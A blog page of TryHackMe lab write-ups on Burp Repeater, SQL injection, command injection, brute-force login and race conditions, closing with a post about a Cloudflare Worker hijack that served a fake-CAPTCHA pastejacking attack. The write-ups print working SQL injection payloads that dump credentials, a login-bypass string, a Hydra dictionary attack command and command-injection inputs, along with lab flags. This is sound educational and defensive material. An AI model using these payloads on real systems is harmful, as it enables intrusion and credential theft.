To use Repeater, you first capture a request in the Proxy module and send it over (using right-click or Ctrl + R). Once sent, the request populates the Request view. Clicking "Send" will execute the request and populate the Response view on the right. You can freely edit the request text and use the history buttons to navigate back and forth through your modifications.

Which view will populate when sending a request from the Proxy module to Repeater?

Request

Task 4: Message Analysis Toolbar

Repeater offers four presentation options for analyzing responses: Pretty (the default, slightly formatted view), Raw (unmodified response), Hex (byte-level representation), and Render (visualized as a web browser page). There is also a "Show non-printable characters" button (\n) to display carriage returns and newlines, which is useful for interpreting HTTP headers.

Which option allows us to visualize the page as it would appear in a web browser?

Render

Task 5: Inspector

The Inspector is a supplementary tool on the right-hand side of the screen that breaks down requests and responses into a visually organized, tabular format. It allows you to easily view, add, edit, or remove components like Request Attributes, Query Parameters, Body Parameters (specific to POST requests), Cookies, and Headers without manually typing them in the raw editor.

Which section in Inspector is specific to POST requests?

Body Parameters

Task 6: Practical Example

Repeater shines when you need to repeatedly send similar requests with minor tweaks, such as testing for SQL injection or bypassing firewalls. In this practical example, the goal is to capture a simple request to the root directory, send it to Repeater, and manually add a custom header (FlagAuthorised: True) to manipulate the server into returning a flag.

What is the flag you receive?

Okay, set the IP target to Mozilla Firefox, but first don't forget to enable FoxyProxy for Burp and enable the intercept feature in Burp.

Then the burp will be the response and just right click then select send to repeater. After that right click, select "send to repeater", next add this parameter: FlagAuthorized: True, finally click send.

THM{Yzg2MWI2ZDhlYzdlNGFiZTUzZTIzMzVi}

Task 7: Challenge

This task requires you to test the input validation of a specific endpoint. By navigating to /products/ and clicking a link, you are taken to a numeric endpoint (e.g., /products/3). You need to intercept this request, forward it to Repeater, and test what happens when you alter the ID parameter to an extreme or invalid input to force a server error.

Enable intercept again and capture a request to one of the numeric products endpoints in the Proxy module, then forward it to Repeater.

No answer needed

See if you can get the server to error out with a "500 Internal Server Error" code by changing the number at the end of the request to extreme inputs. What is the flag you receive when you cause a 500 error in the endpoint?

In this section. First, use the numeric path like /products/1 and then send to repeater.

After that, you can try entering any number in the path. At extreme positive numbers, I only see a "page not found" error like 999999, but when I try with negative numbers, I get a 500 internal error. Allright, and we'll get to the flag.

THM{N2MzMzFhMTA1MmZiYjA2YWQ4M2ZmMzhl}

Task 8: Extra-mile Challenge

This challenge requires you to manually exploit a Union SQL Injection vulnerability on the /about/ID endpoint. By submitting an invalid ID with a single quote (/about/2'), the server leaks the SQL query structure in a 500 Error. Using this leaked information, you can craft a UNION ALL payload to extract column names from the information_schema and ultimately query the notes column for the CEO (ID 1) to retrieve the final flag.

Exploit the union SQL injection vulnerability in the site. What is the flag?

First of all we need to intercept this path first /about/2 and send to repeater (Ctrl + R).

Then, add ' after the path to display the error. After that, we can see the 500 internal server error. And we can see about the SQL request in the response.

This is an extremely useful error message that the server should absolutely not be sending us, but the fact that we have it makes our job significantly more straightforward.

run this sql payload to get the flag /about/0 UNION ALL SELECT notes,null,null,null,null FROM people WHERE id = 1

/about/0: The 0 is likely an intentionally invalid ID meant to make the original database query return an empty result.
UNION ALL: This SQL command combines the results of the application's original query with the attacker's new, injected query.
SELECT notes, null, null, null, null: The attacker is attempting to steal data from a column named notes. The four null values are necessary because a UNION operation requires both combined queries to have the exact same number of columns.
FROM people: This targets a specific table in the database named people.
WHERE id = 1: This filters the requested data, specifically aiming to extract the notes belonging to the user with an ID of 1

Task 9: Conclusion

You have successfully completed the Burp Suite Repeater room and learned how to edit, manipulate, and resend requests manually. The next step in your learning path is the Burp Suite Intruder room, which focuses on automating these customized attacks.

I can use Burp Suite Repeater!

No answer needed

Thanks for reading. See you in the next lab.

SQL Injection | TryHackMe Write-up

Sun, 05 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on SQL Injection. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Brief

SQL (Structured Query Language) Injection (SQLi) is one of the oldest and most damaging web application vulnerabilities. It occurs when a web application passes unvalidated user input into a database query, allowing an attacker to execute malicious commands. This can lead to the theft, deletion, or alteration of private customer data and bypass authentication mechanisms.

What does SQL stand for?

Structured Query Language

Task 2: What is a Database?

A database is an electronic system for storing organized collections of data, controlled by a Database Management System (DBMS). In relational databases (like MySQL or PostgreSQL), data is stored in tables consisting of columns (fields with specific data types like integers or strings) and rows (records). Tables often share information using unique primary keys. Non-relational databases (NoSQL, like MongoDB) offer more flexibility by not strictly requiring a table, row, and column structure.

What is the acronym for the software that controls a database?

DBMS

What is the name of the grid-like structure which holds the data?

Table

Task 3: What is SQL?

SQL is the language used to query and interact with relational databases. Key statements include:

SELECT: Retrieves data (e.g., SELECT * FROM users). You can use LIMIT to restrict results and WHERE or LIKE (with % wildcards) to filter for specific data.
UNION: Combines the results of two or more SELECT statements, provided they have the same number of columns and data types.
INSERT: Adds new rows of data into a table.
UPDATE: Modifies existing data within a table based on specified conditions.
DELETE: Removes rows of data from a table.

What SQL statement is used to retrieve data?

SELECT

What SQL clause can be used to retrieve data from multiple tables?

UNION

What SQL statement is used to add data?

INSERT

Task 4: What is SQL Injection?

SQL Injection is introduced when unvalidated user input is directly appended into a database query. For example, if an application blindly trusts a URL parameter like id=1, an attacker can change it to id=2;--. The semicolon (;) tells the database that the current SQL statement has ended, and the double dashes (--) treat the remainder of the legitimate query as a comment, allowing the attacker's injected logic to execute instead.

What character signifies the end of an SQL query?

;

Task 5: In-Band SQLi

In-Band SQLi is the easiest to detect and exploit because the attacker uses the same communication channel to launch the attack and gather the results. There are two main types:

Error-Based: The attacker injects characters (like ' or ") to intentionally break the query. The resulting database error messages are displayed on the webpage, revealing the database structure.
Union-Based: The attacker uses the UNION SELECT operator to append additional results to the page, making it the most common way to extract large amounts of data (such as querying information_schema to find table and column names).

What is the flag after completing level 1?

Actually, you just need to run the script that has been given from the task, and the last script is the script to get all the user passwords.

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

THM{SQL_INJECTION_3840}

Task 6: Blind SQLi - Authentication Bypass

Blind SQLi occurs when the application is vulnerable, but error messages are disabled, meaning the attacker gets little to no direct feedback. One of the simplest forms is Authentication Bypass. Login forms often just ask the database if a username and password match (true or false). By entering a payload like ' OR 1=1;-- into the password field, the attacker forces the database to evaluate the query as "true," bypassing the login entirely without needing valid credentials.

What is the flag after completing level two? (and moving to level 3)

Just use this script: ' OR 1=1;-- .Where the SQL query is: select * from users where username='' and password='' OR 1=1;--' LIMIT 1; and get success to pass

THM{SQL_INJECTION_9581}

Task 7: Blind SQLi - Boolean Based

Boolean-based SQLi relies entirely on the application's response changing based on a true or false outcome (e.g., a "username taken" vs. "username available" message). By injecting conditional statements and wildcard operators (like database() like 'a%'), an attacker can observe if the condition is true or false. Through a process of elimination, they can enumerate the database name, tables, columns, and data character by character.

What is the flag after completing level three?

In this section, you just need to understand the explanation in the assignment where we need to try various ways one by one for each character, starting from the database name, column name, field name, username, and password.

This enumeration process leads us to get the admin user and the password is 3845 and you will get the flag.

THM{SQL_INJECTION_1093}

Task 8: Blind SQLi - Time Based

Time-Based Blind SQLi is used when the application gives absolutely no visual indicators—no error messages and no true/false behavior differences. Instead, the attacker infers success based on the time the server takes to respond. By injecting time delay commands like SLEEP(5), if the server pauses for 5 seconds before loading the page, the injected condition evaluated to true. This allows the same character-by-character enumeration used in Boolean-based SQLi.

What is the final flag after completing level four?

This is another enumeration process, but time-based. In this method, I reduced the time from 5 to 1 second to speed up the process. Okay, so since we're on task 4 and already predicted the database name is sqli_four,

So, you can validate with this payload to get the correct response: referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four';--

Okay, since this method is the same as level three, I assume the other fields are the same. And when tested with the admin username, the response remains correct. Then we can verify whether the difference lies in the admin user's password.

referrer=admin123' UNION SELECT SLEEP(1),2 from users where username='admin' and password like '4%

The answer is correct. You can continue numbering up to 4 digits.

And this is the correct password that I found

THM{SQL_INJECTION_MASTER}

Task 9: Out-of-Band SQLi

Out-of-Band SQLi is less common and relies on two different communication channels. The attacker uses one channel (like a standard web request) to inject the malicious payload, and the database uses a second channel to send the stolen data back to the attacker. This often involves forcing the database server to make an external network call, such as an HTTP or DNS request, to a machine controlled by the attacker.

Name a protocol beginning with D that can be used to exfiltrate data from a database.

DNS

Task 10: Remediation

Developers can protect web applications from SQL Injection by implementing the following practices:

Prepared Statements (Parameterized Queries): The SQL structure is defined first, and user inputs are treated strictly as parameters/data, preventing them from modifying the query structure.
Input Validation: Employing allow-lists to strictly restrict input to expected strings, or filtering out malicious characters.
Escaping User Input: Adding a backslash (\) before special characters (like ' or ") so the database reads them as normal string text rather than executable commands.

Name a method of protecting yourself from an SQL Injection exploit.

Prepared Statements

Thanks for reading. See you in the next lab.

Become a Hacker | TryHackMe Write-up

Fri, 03 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Become a Hacker. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: What Is Offensive Security?

Summary: Offensive security involves proactively testing systems to identify and fix weaknesses before malicious attackers can exploit them. Unlike regular users, ethical hackers (or penetration testers) systematically observe how systems handle unexpected inputs and attempt to chain weaknesses together. This task sets the foundation, explaining that ethical hacking is always permission-based, structured, and legal.

Prerequisites

I understand the learning objectives and am ready to learn about Offensive Security!

No answer needed

Task 2: Finding Weaknesses

Summary: This task introduces core offensive security terminology: Red Teaming, Penetration Test, Vulnerability, Exploit, and Scope. The most important rule in ethical hacking is having explicit permission to test a system within a defined scope. In the hands-on scenario, you are tasked with finding exposed hidden pages on a target website (http://www.onlineshop.thm/). You can discover these directories manually by guessing URLs or by using automated discovery tools like Gobuster to run a dictionary-based directory brute-force attack.

Using the manual or automated methods described above, what hidden web page did you discover?

Just run this script in terminal to find informative paths

gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt

/login

Based on your Gobuster scan results, what status code is returned when accessing the hidden page?

200

Task 3: Exploiting Weaknesses

Summary: Ethical hackers often find success by chaining multiple small weaknesses together to create a significant impact (like a domino effect). To be successful, you must think like an adversary: question assumptions, test unexpected inputs, and identify valuable targets (sensitive data, admin features, etc.). In the practical exercise, you exploit the hidden login page discovered in Task 2. You use a dictionary attack to guess the admin password, both manually and by leveraging an automated password-cracking tool called Hydra (hydra -l admin -P passlist.txt...).

Using either manual testing or an automated dictionary attack, what password did you discover for the admin user?

Just run this script in terminal to find the password:

hydra -l admin -P passlist.txt <www.onlineshop.thm> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

qwerty

After logging in using the password found, what secret message is displayed on the page?

Go to the /login directory, then log in with the username admin and password qwerty as usual.

THM{born_to_hack!}

Review the output of your Hydra dictionary attack. How many failed password attempts were made before the correct password was found?

17

Task 4: Where to Go From Here

Summary: This final task reviews the key terminology learned throughout the room, including Scope, Vulnerability, Exploit, Enumeration, Credentials, Authentication, and Dictionary Attack. It also outlines potential career paths in offensive security, such as Penetration Tester/Ethical Hacker, Vulnerability Researcher, and Red Team Operator. Finally, it recommends continuous practice and provides links to further learning paths like Cyber Security 101, Jr Penetration Tester, and SOC Level 1.

Complete the room and continue on your cyber learning journey!

No answer needed

Thanks for reading. See you in the next lab.

Command Injection | TryHackMe Write-up

Fri, 03 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Command Injection. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction (What is Command Injection?)

Command injection (also known as Remote Code Execution or RCE) is a severe vulnerability where an attacker abuses an application's behavior to execute operating system commands. These commands run with the same privileges as the application, allowing the attacker to directly interact with the system, read sensitive files, and obtain permissions associated with the application's user account.

Read me!

No answer needed

Task 2: Discovering Command Injection

This vulnerability occurs when applications pass user input to system calls without proper checks. For example, if an application uses a search query to run a command like grep on the OS, an attacker can inject additional commands instead of a normal search term. This flaw can exist in any programming language (such as PHP, Python, or NodeJS) as long as user input is processed and executed by the operating system.

What variable stores the user's input in the PHP code snippet in this task?

$title

What HTTP method is used to retrieve data submitted by a user in the PHP code snippet?

GET

If I wanted to execute the id command in the Python code snippet, what route would I need to visit?

/id

Task 3: Exploiting Command Injection

Attackers exploit this vulnerability by using shell operators (like ;, &, and &&) to chain multiple commands together. Command injection is generally identified in two ways:

Verbose Command Injection: The application directly displays the output of the executed command (e.g., seeing the username when running whoami).
Blind Command Injection: The application provides no direct output. Attackers must use commands that cause a time delay (like ping or sleep) or force an interaction (like curl) to verify if the injection was successful.

What payload would I use if I wanted to determine what user the application is running as?

whoami

What popular network tool would I use to test for blind command injection on a Linux machine?

ping

What payload would I use to test a Windows machine for blind command injection?

timeout

Task 4: Remediating Command Injection

Preventing command injection involves minimizing the use of dangerous functions (such as exec, passthru, and system in PHP) and strictly filtering user input. A highly effective method is "input sanitisation," which involves cleaning the data by restricting it to expected formats (e.g., only allowing numbers) or removing special characters. However, developers must be careful, as attackers constantly find creative ways (like using hexadecimal values) to bypass basic filters.

What is the term for the process of "cleaning" user input that is provided to an application?

sanitisation

Task 5: Practical: Command Injection (Deploy)

This task requires deploying a vulnerable target machine to apply the learned theory. The goal is to experiment with various command injection payloads on the provided web application to successfully read a hidden flag file located on the server.

What user is this application running as?

try typing this payload: & whoami

www-data

What are the contents of the flag located in /home/tryhackme/flag.txt?

Since we know that the previous payload used "&" then we can continue using it again to get the flag with this payload: & cat /home/tryhackme/flag.txt

Task 6: Conclusion

This room provided a comprehensive overview of command injection, covering how to discover the vulnerability, exploit it across different operating systems (Linux and Windows), and secure applications against it. There are often multiple ways to exploit these vulnerabilities, so experimenting with different payloads is highly encouraged.

Terminate the vulnerable machine from task 5.

No answer needed

Thanks for reading. See you in the next lab.

Race Conditions | TryHackMe Write-up

Fri, 03 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Race Conditions. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This task introduces the concept of a race condition vulnerability. A race condition occurs when the timing or sequence of events influences a program's behavior, typically happening when multiple threads access and modify a variable without proper synchronization locks. This flaw can allow attackers to abuse systems, such as applying a single discount multiple times or spending beyond their account balance.

Prerequisites

I know all the prerequisites. Let the race begin!

No answer needed

Task 2: Multi-Threading

This section breaks down the core concepts of computer execution. A Program is a static set of instructions (like a recipe). A Process is a program in active execution, holding memory and moving through various states (New, Ready, Running, Waiting, Terminated). A Thread is a lightweight execution unit within a process. Multi-threading allows a single process (like a web server) to handle multiple user requests simultaneously by spawning threads instead of forcing users to wait in a single-file line.

You downloaded an instruction booklet on how to make an origami crane. What would this instruction booklet resemble in computer terms?

program

What is the name of the state where a process is waiting for an I/O event?

waiting

Task 3: Race Conditions

Race conditions are explained using a real-world analogy of two people trying to reserve the same restaurant table at the exact same time. In software, this is known as a Time-of-Check to Time-of-Use (TOCTOU) vulnerability. If two concurrent threads check a bank balance of $100 and both try to withdraw $50 simultaneously, the lack of proper synchronization might allow both withdrawals to process before the system updates the final balance. This occurs frequently due to parallel execution, concurrent database operations, or poorly designed third-party API integrations.

Does the presented Python script guarantee which thread will reach 100% first? (Yea/Nay)

Nay

In the second execution of the Python script, what is the name of the thread that reached 100% first?

Thread-1

Task 4: Web Application Architecture

Web applications typically use a multi-tier architecture (Presentation, Application, and Data tiers) running on a client-server model. When a system processes logic—like applying a coupon—it doesn't just instantly flip from "not applied" to "applied." It goes through multiple intermediate states (e.g., checking validity, checking constraints, recalculating total). These intermediary steps create a split-second "window of opportunity." By using tools like Burp Suite, an attacker can send simultaneous requests that hit the server within that tiny window, tricking the application into processing the same action multiple times.

How many states did the original state diagram of “validating and conducting money transfer” have?

Two-step process: either the Amount is not sent or the Amount is sent.

2

How many states did the updated state diagram of “validating and conducting money transfer” have?

The server doesn't instantly send the money. It first needs to query the database to verify if you have enough funds. This introduces a third, hidden intermediate state: Checking account balance/limits.

3

How many states did the final state diagram of “validating coupon codes and applying discounts” have?

Coupon not applied
Checking coupon validity
Checking coupon constraints (e.g., is it expired?)
Recalculating the total
Coupon applied.

5

Task 5: Exploiting Race Conditions

This practical task focuses on using Burp Suite Repeater to actively exploit a race condition in a mock mobile operator web app. By capturing a valid POST request (like a money transfer), duplicating it multiple times in a Repeater Tab Group, and sending them in parallel, you can force the requests to arrive at the server within a 0.5-millisecond window. To achieve this synchronization, Burp Suite uses a single TCP packet for HTTP/2 or a "last-byte synchronization" technique for HTTP/1.

You need to get either of the accounts to get more than $100 of credit to get the flag. What is the flag that you obtained?

First, we try to log in as user 07799991337

Then we try to transfer with $8 because the current balance is $8.99. Don't forget to turn on the foxyproxy and burp suite to intercept.

send to Repeater

Create tab Group

Then right click and duplicate the tab. You can fill it with the number 20 because 20 x 8 is 160.

And look at the response, here we can see whether the transaction was successful or not.

Yes, the transaction was successful, then let's validate it.

For user 07799991337, we can see that they have a negative balance due to a large number of transactions. Now, let's check the other accounts (07113371111).

Yes, the transfer was successful and we have got the flag.

THM{PHONE-Race}

Task 6: Detection and Mitigation

Detecting race conditions strictly from business logs is difficult because the malicious actions often look like standard user behavior, making penetration testing crucial. To mitigate these vulnerabilities, developers should use Synchronization Mechanisms (like thread locks), Atomic Operations (grouping instructions so they cannot be interrupted), and Database Transactions (ensuring all operations either succeed completely or fail completely as a single unit).

Make sure you have taken note of the above.

No answer needed

Task 7: Challenge Web App

This is the final unguided challenge. You are tasked with logging into a vulnerable banking application using provided credentials. Using the parallel request techniques learned in Task 5 via Burp Suite, you must exploit a race condition during a money transfer to bypass the normal balance limits and amass over $1000 in a single account.

What flag did you obtain after getting an account’s balance above $1000?

I'll try logging in as Rasser Cond first. Let's see.

Let's try transferring 100. In this scenario, the target amount would only be 100. In this scenario, the target amount would only be 95 due to the $5 transfer fee. Let's enable FoxyProxy for Burp, then enable the intercept feature in Burp Suite, don't forget.

Send to repeater like before.

Create a text group as before, then duplicate the tab as before as well and multiply it to 20 as before as well.

Then send the group in parallel and check one by one what is the status of each transaction.

Because when I checked each transaction, there were some transactions that experienced internal server errors, but this was not a problem because some of them were successful.

Then we need to check and validate the transaction. Is the balance correct?

To validate this, we need to log in to the other account that was used to send the balance previously. That account is the Zavodni Stav account. Let's get started.

We can check whether some transactions were successful and the rest failed. We just need to send this balance to another account such as Warunki Wyscigu user account. let's do it like before.

Send to Repeater
Create gorup tab
Duplicate tab
Send group (parallel)

Because some transactions are true and then we just need to check Warunki Wyscigu.

THM{BANK-RED-FLAG}

Thanks for reading. See you in the next lab.

Database SQL Basics | TryHackMe Write-up

Wed, 01 Apr 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Database SQL Basics. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This section introduces the concept of databases by comparing them to a café's physical notebook. As a business grows, tracking orders with simple files becomes slow and confusing. Databases solve this by storing information in a structured, easily searchable, and manageable way. The learning objectives include understanding data, the purpose of databases, SQL, the structure of tables (rows and columns), and writing basic queries.

Prerequisites

I am ready to dive into the database!

No answer needed

Task 2: Understanding Tables, Rows, and Columns

Databases organize information digitally so computers can search, count, and sort data in seconds. Inside a database, data is stored in tables, which resemble spreadsheets. Columns represent the type of information (e.g., drink, price), while rows represent a complete individual record (e.g., a single customer's order). SQL is the language used to ask the database questions, known as queries, to retrieve specific data without altering it.

Inside databases, what is the term for the "spreadsheets" that store the information?

Table

Task 3: Writing Your First SQL Query

This task explains the four core components of a basic SQL query:

SELECT: Chooses which columns to display (using * selects all columns).
FROM: Specifies which table the data comes from.
WHERE: Filters the results to only show rows that match a specific condition.
ORDER BY: Sorts the output by a specific column (defaults to lowest-to-highest; adding DESC reverses it to highest-to-lowest). These keywords can be combined to run highly specific searches, like filtering for a specific drink and sorting the results by price.

When you showed all orders, how many rows were returned?

This is the script for the solution: SELECT * FROM Orders;

50

When you sorted orders by price from cheapest to most expensive, which drink appeared first?

This is the script for the solution: SELECT * FROM Orders ORDER BY price;

Tea

When you sorted the menu by price from most expensive to cheapest, which drink appeared first?

This is the script for the solution: SELECT * FROM Orders ORDER BY price DESC;

latte

Task 4: Conclusion

The room concludes with a review of how databases store information using tables, rows, and columns. It recaps the four foundational SQL commands learned (SELECT, FROM, WHERE, ORDER BY) and how they are used to show, filter, sort, and retrieve data. Finally, it leaves you with a conceptual question about the security implications of allowing unauthorized users to modify or delete data.

I have successfully completed this room and can write basic SQL queries.

No answer needed

Thanks for reading. See you in the next lab.

Client-Server Basics | TryHackMe Write-up

Tue, 31 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Client-Server Basics. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

In the past, computers operated completely independently, but networks like ARPANET and CYCLADES paved the way for the modern internet by interconnecting systems to share resources. Just like people specializing in society, computer systems specialize to offer services. This section sets the foundation for understanding the Client-Server model and core networking concepts like DNS, clients, servers, ports, protocols, and networks.

Let's go!

No answer needed

Task 2: Pizza Delivery

The Client-Server model is much like ordering takeaway pizza. The client (like a customer's browser) initiates a request. The server (like the pizza shop) processes it and sends a response. A protocol dictates the rules of this communication, ensuring both sides speak the same language and understand the commands. A port is used to identify a specific service running on that server (similar to separate doors for delivery vs. dining in). Finally, DNS (Domain Name Service) translates a human-readable name into an IP (Internet Protocol) address, acting like a GPS to locate the exact destination of the server.

What do we use to identify a specific service on a server?

port

What do we call the address of a server?

Internet Protocol address

Task 3: Web Communication in Practice

HTTP (Hypertext Transfer Protocol) is a stateless client-server protocol used for web communication, meaning each request is processed independently without memory of previous ones (though cookies/tokens add statefulness for logins). Out of the 9 core HTTP methods, GET is the most common and is used to retrieve resources from a web server. When a client makes a GET request, the server returns a response containing a status code (like "200 OK") and a response body (like an HTML page). You can use a browser's Developer Tools (Network tab) to inspect the details of these requests, including the Scheme, Host, Filename, Address, and Status.

What would be the host in the following URL? https://www.iamlearning.thm/contact

<www.iamlearning.thm>

What would be the scheme in the following URL? https://www.iamlearning.thm/contact

https

Task 4: Conclusion

This room wrapped up the basics of how internet devices offer services to one another using the client-server model, where the client initiates and the server responds. It also provided a practical look into the HTTP protocol to show what client requests and server responses look like behind the scenes. The next step is to explore the infrastructure that supports these services by looking into virtualization.

On to the next room!

No answer needed

Thanks for reading. See you in the next lab.

Data Representation | TryHackMe Write-up

Tue, 31 Mar 2026 00:00:00 GMT

This is my write-up for the TryHackMe room on Data Representation. Written in 2026, I hope this write-up helps others learn and practice cybersecurity.

Task 1: Introduction

This section introduces the foundational concept of how computers use the binary system (0s and 1s) to represent data, in contrast to the decimal system (0-9) used by humans. The learning objectives cover how computers represent colors (from 8 basic colors to over 16 million) and understand various numerical systems, including binary, hexadecimal, and octal numbers.

It is time to dive into computer colors!

No answer needed

Task 2: Representing Colors

This section explains how computer screens generate colors using Red, Green, and Blue (RGB) light. It starts with a simple 3-bit system (yielding 8 basic colors) and scales up to a 24-bit system where each color gets a full byte (8 bits), creating over 16.7 million possible color combinations. To make these long 24-bit binary strings easier to read and write, the hexadecimal system is used, where every 4 bits are grouped into a single hex digit (e.g., #A3EA2A).

Preview the color #3BC81E. In one word, what does this color appear to be?

Green

What is the binary representation of the color #EB0037?

11101011 00000000 00110111

What is the decimal representation of the color #D4D8DF?

212 216 223

Task 3: Numbers: From Decimal to Hexadecimal

This task breaks down the mathematics behind different number bases. It explains that the decimal system (base-10) uses powers of 10, while digital systems rely on binary (base-2) using powers of 2. It demonstrates how to mathematically convert binary strings into decimal numbers. Furthermore, it details the hexadecimal (base-16, digits 0-F) and octal (base-8, digits 0-7) systems, providing formulas and examples for converting them back to our standard decimal format.

What is the hexadecimal FF in binary?

In this section, we only need to fill in the values of the questions in the hexadecimal representation column. And next too.

1111 1111

What is the hexadecimal AB in decimal?

171

Convert the hexadecimal FF FF FF to decimal. After you round up the decimal value to the nearest million, how many millions is that?

17

Task 4: Conclusion

The final section summarizes the core concepts covered in the room, recapping the four main number systems: Decimal (Base-10), Binary (Base-2), Hexadecimal (Base-16), and Octal (Base-8). It also reviews the basic units of digital data—bits and bytes (octets)—and how they combine to represent millions of hex colors. Finally, it sets the stage for the next topic on how text and emojis are encoded.

It is time to join the Data Encoding room and dive deeper into bits.

No answer needed

Thanks for reading. See you in the next lab.

The Phantom Edge: A Cloudflare Pastejacking Attack

Sun, 29 Mar 2026 00:00:00 GMT

It was supposed to be a regular day. I opened my browser, navigated to one of my web projects, and was greeted by something that immediately triggered my infosec paranoia: a reCAPTCHA verification prompt.

Wait a minute, I thought. This site is built entirely on Astro.

For the uninitiated, Astro is a Static Site Generator (SSG). It spits out highly optimized, pure HTML, CSS, and minimal JavaScript. There is no backend rendering on the fly, no database to inject into, and absolutely no native reCAPTCHA integrated into this specific build. Seeing a dynamic, interactive "security" prompt on a purely static page is like finding a working television in the middle of the Jurassic period. It simply shouldn't be there.

So, where was this payload coming from? The answer lay not in the server, but in the delivery. I was looking at a textbook Edge Infrastructure compromise.

Here is a detailed of how my Cloudflare account was weaponized to serve a Living-off-the-Land (LotL) Pastejacking attack, and how I nuked it from orbit.

Stage 1: The Illusion of the Origin and the Edge Intercept

When you use a CDN and Web Application Firewall (WAF) like Cloudflare, your architecture fundamentally changes. Your users don't talk to your server; they talk to Cloudflare's Edge network, which then fetches content from your server. It's a fantastic mechanism for speed and security, but it introduces a massive single point of failure: if an attacker controls your Edge routing, they control reality for your users.

Upon inspecting my Cloudflare dashboard, the anomaly was glaringly obvious. Hidden in the Workers & Pages section was a rogue script running under the name worker-white-shadow-3de7.

Cloudflare Workers allow developers to run serverless JavaScript or Rust code directly on Cloudflare's global edge network. They are designed to intercept requests, modify responses, and handle routing before the traffic ever hits the origin server.

The attacker had successfully deployed this malicious Worker and bound it to the wildcard routes of my domains (e.g., *mydomain.com/*).

This meant every single HTTP request made to my static Astro site was being intercepted by this Worker. The Worker acted as a Man-in-the-Middle (MitM). It took the clean HTML generated by Astro, injected a malicious JavaScript payload into the DOM, and served the poisoned HTML to the visitor. My origin server was innocent, but the delivery mechanism was completely compromised.

Stage 2: The Social Engineering Trap (Pastejacking)

Once the malicious Worker successfully injected the script into the victim's browser, the second phase of the attack commenced. This wasn't a silent drive-by download exploiting a browser zero-day. Instead, it relied on a much older, highly effective vulnerability: human psychology.

The payload rendered an overlay that perfectly mimicked a generic CAPTCHA challenge: "Verify you are human. Click 'I'm not a robot'."

This is where the technique known as Pastejacking (or Clipboard Poisoning) comes into play. The visual button is completely fake. It's not communicating with Google's reCAPTCHA servers. Instead, it is bound to an invisible JavaScript event listener utilizing the asynchronous Clipboard API (navigator.clipboard.writeText).

When an unsuspecting user clicks that button, thinking they are solving a CAPTCHA, the malicious script silently copies a heavily obfuscated command-line payload directly into their operating system's clipboard.

Immediately after the click, the UI changes, presenting the victim with a bizarre set of instructions.

The prompt instructs the user to:

Press Windows Key + R (This opens the Windows Run dialog).
Press Ctrl + V (This pastes the poisoned payload they unknowingly copied in the previous step).
Press Enter (This executes the payload with the privileges of the current user).

It sounds ridiculous to a seasoned IT professional. Who would blindly paste and run a command from a website? But to a non-technical user conditioned to jump through hoops to access content, following instructions on a screen under the guise of "human verification" is dangerously plausible.

Stage 3: Living off the Land (LotL) Execution

So, what exactly was the payload trying to execute?

Based on the errors generated when the payload failed to execute smoothly, the attacker was utilizing a Living off the Land (LotL) technique. The error specifically mentioned: Network Error: Windows cannot access C:\WINDOWS\system32\rundll32.exe.

LotL attacks are insidious because they don't drop a standalone, easily detectable executable (like a .exe virus) onto the disk. Instead, they hijack legitimate, built-in system administration tools—like PowerShell, WMI, or in this case, rundll32.exe—to do their dirty work.

rundll32.exe is a standard Windows utility used to load dynamic-link libraries (.dll files) into memory. Attackers love it because it's a trusted Microsoft binary, meaning it often bypasses basic Antivirus and Application Whitelisting rules.

The attacker's pasted command was likely structured to force rundll32.exe to reach out over the network (likely via an SMB/UNC path or a crafted web request), download a malicious DLL payload from an external Command and Control (C2) server, and execute it directly in system memory.

The fact that it threw a "Network Error" suggests that either the endpoint's EDR (Endpoint Detection and Response) caught the anomalous behavior and blocked the outgoing connection, or the attacker's C2 server was temporarily down. Regardless, the intent was a full system compromise, likely aiming to drop an info-stealer or ransomware.

The Incident Response: Nuking the Threat

Identifying the threat is only half the battle; eradicating it quickly is the priority. My remediation process was straightforward but required immediate action.

1. Severing the Edge Connection The immediate fix was to kill the rogue Worker. I navigated to the Cloudflare dashboard, unbinded all the routes associated with worker-white-shadow-3de7, and deleted the Worker entirely. Finally, I purged the Cloudflare cache globally to ensure no poisoned HTML remained in the edge nodes. The site was instantly clean again.

2. The Root Cause and Credential Rotation How did the attacker deploy the Worker in the first place? Cloudflare Workers aren't created by magic; they require authenticated API access or a compromised dashboard session.

The most likely vector was a compromised API token or a hijacked session cookie. It’s highly probable that my credentials were swept up in an info-stealer malware log from another machine, or an overly permissive API token was leaked or abused.

The solution was absolute:

I immediately revoked all existing API tokens.
I changed my Cloudflare account password.
I verified that my Hardware Key / Time-based One-Time Password (TOTP) 2FA was still securely intact and hadn't been tampered with.

Opinion: The Shifting Perimeter and the Danger of the Edge

This incident serves as a stark reminder that the modern security perimeter is incredibly fluid. We spend so much time hardening our origin servers, configuring iptables, and writing secure application code, only to forget that the infrastructure layer above the application holds ultimate power.

An attack on the Edge is an attack on reality. If an attacker controls your DNS or your CDN, your pristine, perfectly secure static site becomes a weapon. They don't need to hack your code; they just need to hijack the pipes delivering it.

Furthermore, the reliance on Social Engineering coupled with LotL techniques highlights a terrifying trend. Attackers are bypassing complex endpoint security not by writing better malware, but by convincing the end-user to execute native system commands for them. The "Fake reCAPTCHA to Clipboard" pipeline is a brilliant, albeit malicious, piece of UX design aimed at exploiting human trust.

The Takeaway: If you manage infrastructure, treat your CDN and DNS provider accounts with the same paranoia as your root server access.

Audit your API Tokens regularly: Never use global API keys. Scope them strictly to the specific resources and actions they need.
Monitor Edge Deployments: Set up alerts for any new Workers or DNS changes in your account.
